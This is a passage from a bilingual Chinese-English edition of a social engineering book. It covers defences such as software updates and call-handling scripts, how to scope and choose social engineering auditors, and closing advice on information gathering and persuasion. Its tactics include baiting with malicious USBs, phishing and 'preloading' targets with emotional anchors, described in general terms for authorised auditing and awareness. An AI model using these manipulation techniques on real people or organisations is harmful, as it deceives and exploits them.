Mitigation for this SE tactic is to ponder the value of the information that you are planning on releasing despite of when in the conversation it is asked for. In the earlier example, the target’s simply waiting for that ID number before continuing any conversation would have been very appropriate and saved him from being duped.

 

这一点并不总是容易做到的,因为员工,尤其是那些面对客户的员工,必须能够发布一些信息而不用担心受到攻击。仅仅意识到信息的价值并不能阻止攻击。

This particular point is not always easy to implement because employees, especially those facing the customer, must be able to release some information without fear of attack. Simply being aware of the value of information cannot alone stop an attack.

 

保持软件更新

Keeping Software Updated

 

在大多数企业中,你必须能够向公众和客户发布信息。即使在我的企业中,我也必须能够提供我的电话号码、电子邮件和网址。我必须能够发送和接收 PDF 文件,并且必须能够自由地与客户、供应商和供应商进行电话交谈。

In most businesses you must be able to release information to the public and to clients. Even in my business I must be able to give out my phone numbers, emails, and web addresses. I must be able to send and receive PDF files and I have to be able to freely talk on the phone with clients, suppliers, and vendors.

 

然而,到目前为止讨论的要点表明,发布任何此类信息都可能意味着一个人的生意和隐私的终结。你能做些什么来拥有发布某些信息的自由,而不必担心终结呢?

However, the points discussed so far indicate that releasing any of this information can be the end of one’s business and possibly privacy. What can you do to have the freedom to release certain information and not fear the end?

 

保持更新。在我们的竞赛中,超过 60% 的公司仍在使用 Internet Explorer 6 和 Adob​​e Acrobat 8​​。这些统计数据令人震惊。

Keep updated. In our contest, more than 60% of the companies that were called were still using Internet Explorer 6 and Adobe Acrobat 8. Those are staggering statistics.

 

仅这两个应用程序就存在数十甚至数百个公开漏洞。知道目标使用这两个应用程序会让他们面临大量攻击,这些攻击可能非常恶意,以至于所有 ID、防火墙和防病毒系统都无法阻止它们。但你知道什么可以阻止它们吗?

Dozens if not hundreds of public vulnerabilities exist in those two applications alone. Knowing that a target uses those two applications opens them up for an enormous number of attacks that can be so malicious that all the IDs, firewalls, and antivirus systems cannot possibly stop them. But do you know what can stop them?

 

答案是更新。最新版本的软件通常已经修补了其安全漏洞,至少是大多数漏洞。如果某个软件的记录很糟糕,请不要使用它;换用漏洞较少的软件。

The answer is updates. The newest versions of software generally have patched their security holes, at least the majority of them. If a particular piece of software has a horrible track record, don’t use it; switch to something less vulnerable.

 

随之而来的问题是,公司在升级方面进展非常缓慢。IE 6 非常老旧,几乎已经到了微软支持生命周期的尽头。Adobe 8 有数十个漏洞可供公众使用。这只是我们在竞赛中发现的众多信息中的两个。但实际情况是,你必须能够发布信息。你必须能够自由地告诉人们发生了什么。为了更放心地做到这一点,你必须确保你和你的员工使用更新的软件。

The problem that comes up is that companies are very slow when it comes to upgrades. IE 6 is very old, almost to the end of its life on Microsoft Support. Adobe 8 has dozens of exploits publicly available. That is just two of the many pieces of information we found out in the contest. The reality of the matter, though, is that you have to be able to release information. You must be able to freely tell people what is going on. To do that with less worry, you must make sure you and your employee use updated software.

 

在竞赛电话中,如果员工泄露公司使用 Firefox、Chrome 或其他安全浏览器,或者 FoxIt 或最新的 Adob​​e 软件,参赛者就会被关闭。我并不是说这些软件完全没有遇到任何问题。某些版本的漏洞肯定存在,但这个软件的漏洞要少得多。拥有这些信息仍然很有价值,但如果没有可用的漏洞,那么下一阶段的攻击就无法启动。

In the contest calls, if an employee divulged that the company used Firefox, Chrome, or another secure browser, or FoxIt or the most up-to-date Adobe software, contestants would have been shut down. I am not saying those pieces of software do not experience any problems at all. Exploits for certain versions certainly exist, but this software is significantly less vulnerable. The possession of that information is still valuable but if no exploits are available then the next phase of the attack cannot be launched.

 

保持软件更新似乎是最受批评的一条建议,因为它需要做最多的工作,并且会产生最多的开销。改变允许非常旧的软件继续使用的内部政策和方法可能非常困难,并会导致各种内部变动。

Keeping software updated is the one tip that seems to get the most flack because it takes the most work and can cause the most overhead. Changing internal policies and methodologies that allow very old software to still be in play can be very difficult and cause all sorts of internal shifts.

 

然而,如果一家公司致力于安全并致力于创造个人安全意识,那么致力于这些改变将成为企业文化的一部分。

However, if a company is committed to security and committed to creating a personal security awareness then committing to these changes will become part of the business culture.

 

开发脚本

Developing Scripts

 

还有一件有益的事情值得一提:制定脚本。不要畏缩;我指的脚本不是员工在情况等于 A 加 B 时必须说 X。我指的是大纲,它可以帮助员工在最关键的时候准备好使用批判性思维。考虑以下场景:

One more beneficial thing bears mentioning: develop scripts. Don’t cringe; I don’t mean scripts in the sense that the employee must say X if a situation equals A plus B. I am talking about outlines that help an employee be prepared to use critical thinking when it counts the most. Consider these scenarios:

 

当有人自称是 CEO 的员工并打电话要求您提供密码时,正确的反应是什么?当一个没有预约但外表和行为举止像供应商的人要求进入建筑物或房产的某个部分时,您会怎么做?

What is the proper response when someone who claims to work for the CEO calls and demands your password? What do you do when a guy who has no appointment but looks and acts the part of a vendor demands access to a part of the building or property?

 

脚本可以帮助员工确定在这些情况下的正确反应,并帮助他们感到安心。例如,脚本可能如下所示:

Scripts can help an employee determine the proper response during these circumstances and help them feel at ease. For example, a script may look like this:

 

如果有人打电话自称是管理处的人,并要求交出信息或内部数据,请按照以下步骤操作:

If someone calls and claims to be from the management office and demands compliance of either handing over information or internal data, follow these steps:

 

1.询问该人的员工 ID 号和姓名。在获得这些信息之前,不要回答任何问题。

2.获取识别信息后,询问其所管理的需要此信息的项目相关的项目 ID 号。

3.如果成功获取步骤 1 和 2 中的信息,则执行操作。如果没有,请让该人员让其经理向您的经理发送电子邮件,请求授权并终止通话。

1. Ask for the person’s employee ID number and name. Do not answer any questions until you have this information.

2. After getting the identifying information, ask for the project ID number related to the project he or she is managing that requires this information.

3. If the information in steps 1 and 2 is successfully obtained, comply. If it’s not, ask the person to have his or her manager send an email to your manager requesting authorization and terminate the call.

 

像这样的简单脚本可以帮助员工知道在考验他们的安全意识的情况下该说什么、做什么。

A simple script like this can help employees know what to say and do in circumstances that can try their security consciousness.

 

从社会工程审计中学习

Learning from Social Engineering Audits

 

如果你曾经摔断过肢体,你就会知道,当你康复时,医生可能会让你去做治疗。当治疗师帮你康复时,你可能会接受一些压力测试。这种测试可以让医生知道你是否有需要加强的弱点。这同样适用于你的企业,只不过不是等到“骨折”发生后再进行“测试”,而是通过社会工程审计,你可以在违规行为发生之前对公司进行压力测试。

If you have ever broken a limb you know that as you recover your doctor may send you for therapy. As therapists rehabilitate you, you may undergo some stress testing. This type of testing enables your doctors to see whether you have weaknesses that need to be strengthened. The same applies for your business, except instead of waiting for the “break” to occur before you “test,” social engineering audits enable you to stress-test your company before a breach occurs.

 

以下部分回答了有关社会工程审计以及如何选择最佳审计员的一些关键问题。在深入了解社会工程审计之前,您应该知道审计到底是什么。

The following sections answer a few key questions when it comes to social engineering audits and how to choose the best auditor. Before getting into the depth of social engineering audits, you should know what an audit really is.

 

了解什么是社会工程审计

Understanding What a Social Engineering Audit Is

 

从最基本的意义上讲,社会工程审计就是雇佣安全专业人员通过模拟恶意社会工程师会使用的相同攻击来测试公司的人员、政策和物理边界。恶意社会工程师和专业审计员之间的两个主要区别是:

In the most basic terms a social engineering audit is where a security professional is hired to test the people, policies, and physical perimeter of a company by simulating the same attacks that a malicious social engineer would use. The two main differences between a malicious social engineer and a professional auditor are:

 
 
     
  • 通常,专业审计师会遵循道德和法律准则。
  • Usually, moral and legal guidelines exist that a professional auditor will follow.
  •  
     
  • 专业审计师的目标始终是帮助客户,而不是让客户难堪、偷窃或伤害客户。
  • The goals of the professional auditor are always to help and not to embarrass, steal, or harm a client.
  •  
     
  • 专业审计通常具有范围限制,而这些限制不会强加于真正的攻击者。
  • Professional audits generally have scope limitations that are not imposed upon real attackers.
  •  
 

专业审计员将花费大量时间分析和收集“目标”或客户的数据,并利用这些信息制定切实可行的攻击媒介。在执行此操作时,专业审计员始终牢记每次审计的书面目标。这是难题中必不可少的一部分,因为走上一条可能对 SE 和目标都产生非常不良影响的道路可能很诱人。明确定义的目标可以防止社会工程审计员犯下这种错误。

The professional auditor will spend a lot of time analyzing and gathering data on a “target” or client and will use that information to develop realistic attack vectors. While doing this the professional auditor always keeps in mind the goals that are set forth in writing for each audit. This is an essential piece of the puzzle, because going down a path that can have very bad repercussions on both the SE and the target might be tempting. Clearly defined goals can keep a social engineering auditor from making that mistake.

 

设定审计目标

Setting Audit Goals

 

专业社交工程师必须遵守道德和伦理规范,同时还要跨越允许他或她戴上恶意社交工程师的真正“黑帽”的界限。这意味着他或她要记下可以用来获取访问权限并暴露公司防御漏洞或弱点的东西,无论它看起来有多低劣。

The professional social engineer must engage in moral and ethical behavior while still stretching across that line that allows him or her to put on the true “black hat” of a malicious social engineer. This means taking note of things that he or she can use to gain access and expose a hole or weakness in a company’s defenses, no matter how low it may seem.

 

发现安全漏洞必须与对员工个人的关注相平衡。遭受社会工程审计攻击的公司通常认为,解雇受攻击的员工可以解决问题并堵住“漏洞”。客户没有意识到,经过审计后,那些受攻击的员工可能是当时大楼里最安全的人

Finding the security gaps has to be balanced with a concern for the individual employees. Companies who are hacked with a social engineering audit often think that firing the employee(s) who fell for the attack fixes the problem and plugs the “hole.” What the client fails to realize is that after an audit, those employees who did fall for the attacks are probably the most secure people in the building at that time.

 

专业社会工程师必须采取额外的预防措施,以确保员工不会陷入危险。我个人非常重视告诉客户,审计与员工无关,而且,就我所能帮助的而言,我不会列出被利用的员工的姓名。在无法帮助而需要列出这些姓名的情况下,我会在报告中重点介绍公司在培训、政策和防御方面存在的缺陷,这些缺陷导致员工出现问题。

The professional social engineer must take extra precaution to ensure that the employees are not put into the line of fire. Personally I make it a key point to tell clients that the audit is not about the employees and, as far as I can help it, I do not include names of the employees who were used. In cases where that cannot be helped and I need to include those names, I focus the report on the flaws the company has in its training, policies, and defenses that allowed the employee to falter.

 

例行的社会工程审计绝不应该选择将员工置于危险境地,或者毁掉他们的人格或生活。在与审计员概述审计目标时,我会针对以下关键领域列出强度级别(从 0 到 10):

Throwing an employee under the bus, so to speak, or ruining his or her character or life should never be an option for a routine social engineering audit. When outlining the goals of an audit with an auditor I outline the level of intensity from 0 to 10 for these key areas:

 
 
     
  • 确定员工是否会点击电子邮件中的链接或打开不熟悉的人发送的文件,从而导致泄露
  • To determine whether employees will click on links in emails or open files from people they do not know well, leading to compromise
  •  
     
  • 确定员工是否会访问某个网站并在该网站输入个人或业务相关信息
  • To determine whether an employee would go to a website and enter personal or business-related information on that site
  •  
     
  • 确定通过员工在工作场所或个人场所(即酒吧、健身房、日托中心)的电话或亲自拜访可以获得多少信息
  • To determine how much information can be obtained via the phone or in-person visits of employees at work or personal places (that is, bars, gyms, daycares)
  •  
     
  • 通过测试锁、摄像头、运动传感器和保安人员来确定办公室周边的安全级别
  • To determine the level of security in the office perimeter by testing locks, cameras, motion sensors, and security guards
  •  
     
  • 确定社会工程师创建恶意 USB 或 DVD 的能力,诱使员工在自己的工作电脑上使用,从而危害企业
  • To determine the ability of a social engineer to create a malicious USB or DVD that will entice the employee to use it on his or her work computer, compromising the business
  •  
 

当然,会有更多的领域接受测试,但我试图做的是详细概述公司对这次审计的目标。我发现公司往往不知道他们想要什么。审计员的工作是引导他们通过不同的途径进入公司,并确定他们想要测试哪些途径。

Of course, more areas will be tested, but what I try to do is outline closely the goals the company has for this audit. What I find is that companies often do not know what they want. The auditor’s job is to walk them through different avenues into the company and to determine which of those they want tested.

 

当明确定义这些目标时,您还应该列出一份永远不会包含在审计中的事情的清单。

When these goals are clearly defined, you should also include a list of things that are never to be included in an audit.

 

审计中应该和不应该包括什么

What Should and Should Not Be Included in an Audit

 

有许多不同的方法可以测试所概述的目标,以清楚地了解公司是否存在安全漏洞。使用本书中的所有原则可以帮助制定良好的攻击计划。但是,在计划攻击时,应避免以下几点。例如:

Many different ways exist for testing the outlined goals to see clearly whether a security hole exists in a company. Using all the principles in this book can help outline a good plan for attack. However, avoid some things when planning an attack. Things like:

 
 
     
  • 攻击目标的家人或朋友
  • Attacking a target’s family or friends
  •  
     
  • 栽赃犯罪或不忠行为,以诋毁目标
  • Planting evidence of crimes or infidelity to discredit a target
  •  
     
  • 根据当地法律,冒充执法人员可能是违法的
  • Depending on the laws of the land, impersonating law enforcement can be illegal
  •  
     
  • 闯入目标的家或公寓
  • Breaking into a target’s home or apartment
  •  
     
  • 利用真实事件或令人尴尬的情况来勒索目标,使其就范
  • Using evidence of a real affair or embarrassing circumstance to blackmail a target into compliance
  •  
 

这类事情应该不惜一切代价避免,因为它们无法实现目标,而且会让目标感到被侵犯。然而,如果审计证据中出现了这些事情,那么问题确实出现了,该怎么办。每个审计师都必须亲自决定如何处理这些情况,但请考虑几个例子。

Things like these should be avoided at all costs because they do not accomplish the goal and leave the target feeling violated. However, the question does come up about what to do if in an audit evidence appears of some of these things. Each auditor must personally decide how to handle these circumstances, but consider a couple of examples.

 

在一次审计中,审计员发现一名员工正在使用公司的高速互联网将数千兆字节的色情内容下载到外部硬盘上。为了避免冒着员工被解雇的风险,审计员找到了这名员工并告诉他,他知道这件事,但他不想让他被解雇,所以只是警告他停止。这名员工感到尴尬和不安,并认为审计员还会举报他。他决定先发制人地打击这种攻击,并去找老板说审计员正在他的电脑上植入这一犯罪行为的证据。

In one audit, an auditor found out an employee was using the company’s high-speed Internet to download gigabytes worth of porn to external hard drives. Instead of risking the employee’s getting fired he went to the employee and told him he knew, but he didn’t want him to get fired and just gave him a warning to stop. The employee became embarrassed and upset and figured the auditor was going to still report him. He decided he wanted to preemptively combat this attack and he went to the owners and said the auditor was planting evidence of this offense on his computer.

 

当然,审计员有入侵发生时的日志和截图,但无论如何,这名员工还是被解雇了。但审计员也因在发现公司有严格政策的违规行为时不站出来而受到斥责。

Of course, the auditor had logs and screenshots of when the compromise occurred and the employee was fired anyway. But also the auditor was reprimanded for not coming forward when he found an offense of which the company had a strict policy.

 

在另一个账户中,审计员发现证据表明一名男子将儿童色情内容下载到他的电脑上,然后将其分发给互联网上的其他人。审计员从电脑上的其他图片中得知,他有妻子和孩子,举报此事会导致离婚,甚至入狱,并毁掉他的职业生涯以及家庭生活。

In another account, the auditor found evidence of a man downloading child pornography to his computer and then distributing it to others on the Internet. The auditor knew from the other images on his computer that he had a wife and children and that reporting this would lead to divorce, probably jail time, and the ruination of his career as well as the family’s life.

 

根据当地法律,儿童色情是违法的,而且在道德上令人厌恶和卑鄙。审计员向公司和当局举报了这名男子,这让他失去了事业、家庭和自由。

The law of the land was that child pornography was illegal, as well as morally disgusting and vile. The auditor turned the man in to the company as well as the authorities, which cost that man his career, family, and freedom.

 

拥有一份明确界定的“禁止”清单可以提高您的审计质量,并防止您违反自己的道德和法律准则。在一次采访中,我采访了乔·纳瓦罗,他是世界上非语言交流方面的领军人物之一,他谈到了这一点。他说,除非您是执法人员,否则您必须在参与工作之前决定您将跨越和不会跨越哪些界限。考虑到这一点,审计师应该在审计中包括哪些内容?

Having a clearly defined “do not” list enhances your audits and keeps you from crossing your own moral and legal guidelines. In one interview I had with Joe Navarro, one of the world’s leaders on nonverbal communication, he made a statement about this point. He said that unless you are a law enforcement agent you have to decide what lines you will and will not cross before you enter into an engagement. With that in mind then what things should an auditor include in audits?

 
 
     
  • 网络钓鱼攻击:有针对性的电子邮件攻击,使公司能够通过电子邮件了解其员工是否容易受到攻击。
  • Phishing Attacks: Targeted email attacks that allow a company to see whether its employees are susceptible to attacks through email.
  •  
     
  • 以面对面攻击为借口:选择非常精确和可控的借口,然后通过电话或面对面进行攻击,以确定员工是否会上当。
  • Pretexting In-Person Attacks: Very precise and controlled pretexts are chosen and then performed over the phone or in-person to determine whether employees will fall for them.
  •  
     
  • 诱饵:一种面对面的攻击,通过某种方法进入目标的建筑物或其他财产,并放置包含嵌入恶意代码的恶意文件的 USB 或 DVD。
  • Baiting: An in-person attack where access is gained to the target’s building or other property by some method, and USBs or DVDs are dropped that contain malicious files on them embedded with malicious code.
  •  
     
  • 尾随(或搭便车):一种面对面的攻击,审计员试图接近一群员工,通过跟随他们进入大楼。
  • Tailgating (or piggybacking): An in-person attack where the auditor attempts to approach a group of employees to gain access to the building by just following them in.
  •  
     
  • 物理安全(红队):试图物理进入办公室并将贵重物品带入公司。
  • Physical Security (Red Team): An attempt to gain physical access to an office and take items of value to the company.
  •  
 

这份简短的清单可以帮助专业审计师制定一些指导方针,定义哪些应该包括,哪些不应该包括。然而,许多公司面临的最大问题之一是如何挑选出一名优秀的审计师,能够完成手头的这些任务。

This short list can help a professional auditor set some guidelines to define what should and should not be included. Still, one of the largest problems many companies have is trying to pick out a good auditor, one who can accomplish these tasks at hand.

 

选择最佳审计师

Choosing the Best Auditor

 

如果您摔断了肢体,而且伤势严重,医生告诉您,您只有 50% 的康复机会,但去看一位优秀的外科医生可能会增加这个几率,您会不会四处寻找一位优秀的外科医生来治疗您的问题?当您找到他时,您会问什么问题?您不想看看他过去的工作吗?您会想要一些证据来证明他能够理解概念并执行任务,从而增加您康复的机会。

If you broke a limb and the damage was bad, and a doctor told you that you have a chance for only 50% recovery, but that going to see a good surgeon could increase those odds, wouldn’t you search high and low for a good surgeon to fix your problems? And when you found him, what questions would you ask? Wouldn’t you want to see his past work? You would want some proof of his ability to grasp the concepts and perform the tasks that would increase your chances of recovery.

 

您可以按照类似的流程来找到合适的审计师。以下是您在与审计师交谈时可能需要了解的一些基本信息:

You follow a similar process to find the right auditor. Here are some of the basics that you might want to find out as you speak to an auditor:

 
 
     
  • 知识:该团队是否发布过任何研究、论文、演讲或其他材料,表明他们了解社会工程学?他们在社区中是否以该领域的领导者而闻名?您不想将您的审计和安全委托给使用过时方法且不了解最新策略的团队。
  • Knowledge: Has the team released any research, papers, speeches, or other materials that display they are knowledgeable about social engineering? Are they known in the community for being leaders in this field? You do not want to trust your audit and security to a team that is using outdated methods and is not up on the most recent tactics being used.
  •  
 

如果不做一点研究,很难确定审计师和团队的知识水平。询问审计师关于这些主题的任何论文、文章或信息并不是一个坏主意。确保您雇用的团队处于行业领先地位。
 
     
  • 经验:客户通常不愿意被识别或命名。就我而言,许​​多客户不愿意出现在网站或营销材料上,因为他们觉得这会让他们感到尴尬或让他们处于危险之中。但你可以通过其他方式确定审计师的经验。询问他过去使用过的方法以及他如何实施解决方案。
  •  
 

Determining the amount of knowledge an auditor and team has is hard to do without a little research. Asking auditors about any papers, articles, or information they have written on the topics is not a bad idea. Make sure the team you hire is at the top of its game.
 
     
  • Experience: Clients often do not want to be identified or named. In my case, many clients do not want to be put on a website or marketing material because they feel this will embarrass them or make them vulnerable. But you can determine the experience of the auditor in other ways. Ask him about the methods he has used and how he implemented solutions in the past.
  •  
 

 

审计员通常不想在初次见面时泄露所有秘密,但会要求他提供一两次他发起的攻击的记录,这将有助于您确定他的技能水平。
 
     
  • 合同: 对审计进行全面概述、记录和设置限制,对成功进行审计大有裨益。就我个人而言,我不喜欢在大量限制下工作,因为大多数恶意社交工程师根本没有任何限制。但至少应该就允许和不允许的一小部分规则达成一致。
  •  
 

An auditor often does not want to let all the secrets out of the bag in an initial meeting, but ask him for one or two accounts of attacks he launched, which will help you determine his level of skill.
 
     
  • Contract: Having the audit completely outlined, documented, and limitations set can go a long way toward a successful audit. Personally, I do not like to work with a ton of limitations because most malicious social engineers do not have any at all. But at least a small subset of rules written out on what is and is not allowed should be agreed upon.
  •  
 

 

社会工程师希望获得许可,可以记录电话通话;对建筑物和互动进行视频记录;并且,如果审计包括物理安全,则需要获得书面许可,才能将物品带离场所。审计员不希望在完成审计后,只收到逮捕令或诉讼。

A social engineer wants permission to record phone calls; video-record the building and interactions; and especially if an audit includes physical security, to have written permission to remove items from the premises. An auditor doesn’t want to finish the audit just to be presented with a warrant or a lawsuit.

 

还要指定一名了解审计情况并能为审计员和团队担保的紧急联系人。如果审计员发现自己陷入法律困境,他会想要一个可以拨打的号码。没有人希望在深夜翻找垃圾,然后被警察拦住,不得不在监狱里度过一夜。有联系人可以为你提供一张“免于入狱”的通行证,从长远来看可以省去很多麻烦。
 
     
  • 融洽关系:运用本书中的原则来寻找优秀的审计师。当您通过电话或亲自与他交谈时,他给您的感觉如何?您看到了什么?您是否觉得他非常专业并且他的目标是真正帮助您?
  •  
 

Also designate an emergency contact person who knows about the audit and can vouch for the auditor and team. If an auditor finds himself in a legal jam he’ll want a number to call. No one wants to be performing a late-night dumpster dive to be met by the police and have to sit the night in jail. Having a contact person provides a “get out of jail free” card and can save a lot of hassle in the long run.
 
     
  • Rapport: Apply the principles in this book to find a good auditor. When you speak with him on the phone or in person how does he make you feel? What do you see? Do you get the sense he is very professional and his goal is to really help you?
  •  
 

 

该团队是否将自己及其业务描绘成您想要与之联系的团队?如果您是聘请审计员的项目经理,那么您将承担大量责任。审计员可能不想与团队会面。了解 SE 团队的人越少,物理安全审计就越好。因此,团队可能只想与一两个人见面。这意味着您必须确保审计员素质高,能够完成所需的工作。
 
     
  • 时间: 公司在寻求审计师帮助时犯的最大错误之一就是没有给他们足够的时间来完成工作。他们认为,几个电话或一次现场访问都可以在一天内完成。虽然这可能是真的,但信息收集、规划和确定目标呢?这些事情需要时间。时间很重要,但它也是一把双刃剑——给审计师足够的时间来做好工作,但不要花太多时间,以免成为成本问题。管理,但不要微观管理。
  •  
 

Does the team portray itself and its business as one you want to be associated with? If you are the project manager who is hiring an auditor, a load of responsibility rests with you. The auditor may not want to meet with a team. The fewer people who know what the SE team looks like, the better for physical security audits. The team, as a result, may only want to meet with one or two people. This means you must ensure the auditor is high quality and can do the work needed.
 
     
  • Time: One of the biggest mistakes companies make when seeking auditors to help them is not giving them enough time to perform the job. They figure that a few phone calls or one site visit can all be accomplished in one day. Although that may be true, what about information gathering, planning, and scoping out the targets? These things take time. Time is important but it is also a double-edged sword—allow enough time for the auditor to do a good job, but not so much time that it becomes a cost problem. Manage, but do not micro-manage.
  •  
 

 

这些只是为您的公司选择合适的审计师时需要考虑的几个方面。最终,您必须感到放心和高兴,因为社会工程团队会把您的最大利益放在心上,会尽最大努力保持专业,并遵守指导方针。

These are just a few of the areas to consider when choosing the right auditor for your company. In the end you must feel comfortable and good that the social engineering team will have your best interests at heart, will do their best to remain professional, and stay within the guidelines.

 

结束语

Concluding Remarks

 

知识若不付诸实践就毫无价值。

Knowledge is of no value unless you put it into practice.

 

—安东·契诃夫

—Anton Chekhov

 

我在这本书中提供的信息并不轻松。很多信息都表明人们的思维和行为方式存在严重漏洞。当我和导师 Mati 一起教授安全课程时,他谈到了一种名为“shikata ga nai”的有效载荷编码器,这是日语中“无可奈何”的意思,粗略翻译为“没有希望”。

The information that I provide in this book is not light-hearted. Much of the information shows serious vulnerabilities in the way people think and act. When I teach security classes with my mentor, Mati, he talks about a payload encoder called “shikata ga nai,” which is Japanese for “it cannot be helped” or roughly translated, “there is no hope.”

 

我曾想过以此作为题词,但我认为“没有希望”这句话比我通常喜欢的宿命论更有点宿命论的味道。相反,我觉得关于实践和知识的想法更符合本书的主题。我曾多次表示,完善技能以及检测这些技能在使用中的能力需要的不仅仅是知识。对我在本书中提到的事情过于恐惧会导致对人们遭受黑客攻击的所有方式感到愤怒,这只会让我们走上一条封闭自己思想的道路。相反,我建议以一种不同于恐惧的方式来对待本书中的信息:一种新的心态,鼓励你学习和思考,并理解“坏人”使用的方法,这样你就可以免受他们的伤害。

I thought about making that the epigraph, but I thought the phrase “there is no hope” is a little more fatalistic than I like to be normally. Instead, I feel the thought about practice and knowledge fits more of the theme of the book. I have stated time and again that perfecting the skills as well as the ability to detect these skills in use takes a lot more than just knowledge. Being too afraid about the things I have mentioned in this book leads to anger at all the ways people get hacked, which only leads down a path that will cause us to close our minds. Instead I suggest a different approach to the information in this book besides fear: A new mindset that encourages you to learn and think and understand the methods the “bad guys” use so you can be protected from falling prey to them.

 

现在我并不是说恐惧是无处可去的。当然,有些健康的恐惧是有空间的。保护你的数据、你的个人信息和你的身份,同时理解“黑客”的心态,结合本书中的信息,可能会对你更有益。

Now I am not saying that there is no place for fear. There definitely is room to feel some healthy fear. Protecting your data, your personal information, and your identity, but at the same time understanding the “hacker” mindset combined with the information in this book, might be more beneficial to you.

 

本节涉及一些我希望您可以从本书中获取并在您的生活中使用的内容,特别是如果您负责公司,客户的安全,或者为了您自己的个人安全而阅读本书。

This section touches on a few things I hope you can take away from this book and use in your life, especially if you are in charge of security for your company, your clients, or reading this for your own personal security..

 

社会工程学并不总是负面的

Social Engineering Isn’t Always Negative

 

我希望我让你明白,社会工程学并不总是负面的。使用社会工程学策略的并不总是黑客或骗子。医生、治疗师、社会工作者、父母、孩子、老板、员工——每个人都在某种程度上使用社会工程学策略。说服的艺术经常在正常的日常社交场合中使用。

I hope that I impressed upon you that social engineering is not always negative. It is not always the hackers or the con men who use social engineering tactics. Doctors, therapists, social workers, parents, children, bosses, employees—everyone uses social engineering tactics to some extent. The art of persuasion is used often in normal everyday social situations.

 

了解社会工程学并不总是可怕、黑暗和邪恶的,可以大大有助于揭示某些技能的使用方式。了解这些技能后,练习并熟练掌握它们;然后,辨别它们是如何被用来对付人们的就会变得容易得多。

Learning that social engineering isn’t always scary, dark, and evil can go a long way toward uncovering how certain skills are used. After you understand those skills, practice and become skilled or proficient in them; discerning how they are being used against people then becomes much easier.

 

你可以找到一些不属于世界黑暗角落的地方来分析这些技能。你可以阅读有关心理学、说服和销售的书籍,然后在现场观察这些技能是如何使用的。

You can find places to analyze these skills that are not in the dark corners of the world. You can read books on psychology, persuasion, and sales, then observe in the field to see how these skills are used.

 

收集和组织信息的重要性

The Importance of Gathering and Organizing Information

 

我真的再怎么强调高质量的信息收集的重要性都不为过。每一次社会工程活动的质量、专业性和成功都取决于你收集信息的水平。网络是一个无限而无尽的信息资源。公司发布他们的财务记录、员工姓名和头衔、联系信息、实际位置的图片、安全政策、合同、供应商和供应商的姓名、个人文件等等。在个人层面上,员工和普通人都会发布个人照片、他们的地址、他们的购买记录、租约、合同、最喜欢的食物、团队、音乐等等。

I cannot really reiterate enough how important quality information gathering truly is. The quality, professionalism, and the very success of every social engineering engagement depends on the level of information gathering you do. The Web is a boundless and endless resource of information. Companies post their financial records, employees’ names and titles, contact information, pictures of physical location, security policies, contracts, vendors and suppliers’ names, people’s personal files, and so much more. On a personal level, employees as well as everyday people post personal pictures, their addresses, their purchases, leases, contracts, favorite foods, teams, music, and so on.

 

掌握了这些海量的信息后,社会工程师就可以挑选自己想要使用什么以及要实施哪种攻击媒介。随着攻击的继续,收集到的信息将使社会工程师能够使用对目标产生最大影响的故事情节和借口。如本书所重申的,如果不收集信息,攻击很可能会导致失败。

Armed with all this overwhelming amount of information a social engineer can pick and chose what he wants to use and what kind of attack vector to implement. As the engagement continues the information gathered will give the social engineer the ability to use story lines and pretexts that will have the greatest effect on the target. Without information gathering, as reiterated throughout the book, the engagement will most likely lead to failure.

 

例如,如果给一名专业审计师三周时间,他应该用其中一半的时间收集信息。然而,专业审计师往往容易激动,用老套的借口接近目标。不要养成这种习惯;花大量时间收集信息。

For example, if a professional auditor is given three weeks for a job, he should spend half of that time gathering information. However, professional auditors often have a tendency to get excited and approach the target with the old standby pretexts. Do not fall into this habit; spend a lot of time in information gathering.

 

与信息收集本身同样重要的是如何存储和分类信息——也许可以使用第 2 章中提到的方法来存储和组织这些信息。学会不仅高效地收集信息,而且学会如何存储信息,可以大大提高信息的使用效率。不要简单地将信息转储到庞大的文档中,而是对信息进行分类、编目和标记,这样可以使信息易于使用,尤其是在您进行电话交流时。

Almost as important as the information gathering itself is how you store and catalogue the information—perhaps by using one of the methods mentioned in Chapter 2 to store and organize this information. Learning to not just efficiently collect the information but how to store the information can go a long way toward making it efficient to use. Not simply dumping things into a massive document but categorizing things, cataloging them, and labeling them will make the information easy to use, especially if you are on a phone engagement.

 

请记住,社交工程师的水平完全取决于他获得的信息。我亲眼目睹了太多的演出因为信息错误或缺乏信息而付诸东流。与此同时,我也看到一些人可能不是最流利的演讲者或最有魅力的人,因为他们收集的信息而在非常困难的情况下取得了成功。

Just remember that a social engineer is only as good as the information he obtains. I personally have seen too many gigs go down the drain because of bad information or lack of information. At the same time I have seen people who might not be the smoothest speakers or the most charming succeed in very difficult situations because of the information they gathered.

 

信息是社会工程学的关键,如果你能从这本书中学到什么的话,那就是信息。

Information is the crux of social engineering, and if you take anything away from this book, let it be that.

 

谨慎选择用词

Choose Your Words Carefully

 

正如本节的开篇题词一样,本主题让人想到,除非你付诸实践,否则信息毫无价值。你可以收集、整理和分类所有信息,但你需要有效地使用它们。第一步是组织你将使用的词语。

Just like this section’s opening epigraph, this topic lends itself to the thought that information has no value unless you put it into practice. You can have all the information gathered and organized and catalogued, but you need to use it efficiently. The first step in this is to organize what words you will use.

 

我讨论了诱导和预加载的技巧。这是两项最有价值的技巧,我希望你能练习使用它们。使用锚点、关键词和短语给目标注入情感和想法,让他跟随你的引导。预加载是一种非常强大的技巧,无法在短时间内掌握,但练习将使你能够使用这项技能。预加载的伟大之处在于你可以在家里、在工作中、与你的孩子、你的父母、你的客户,实际上在任何地方练习这项技能。

I discussed the skills of elicitation and preloading. These are two of the most valuable skills, and I hope you practice using them. Use anchors, keywords, and phrases to load the target with emotions and thoughts to make him follow your lead. Preloading is a very powerful technique that cannot be mastered in a short while, but practice will enable you to use this skill. The great thing about preloading is that you can practice this skill at home, at work, with your kids, your parents, your clients, really anywhere.

 

不要以为练习这个就意味着你总是要让人们违背自己的意愿去做事。预加载用于激励人们的思想,使他们更愿意接受建议或想法。你不必恶意地使用它。孩子们总是这样做。例如,你的女儿说:“爸爸,我爱你……”几秒钟后又说:“我可以要那个新娃娃吗?”这就是预加载的一个例子,将“目标”置于一种愉快的情绪状态。

Don’t think that practicing this means you will always have to get people to do things against their will. Preloading is used to motivate people’s minds to be more open to a suggestion or idea. You don’t have to use it maliciously. Kids do it all the time. For example, your daughter says, “Daddy, I love you…” and adds a few seconds later, “Can I have that new doll?” This is an example of preloading, putting a “target” into an agreeable emotional state.

 

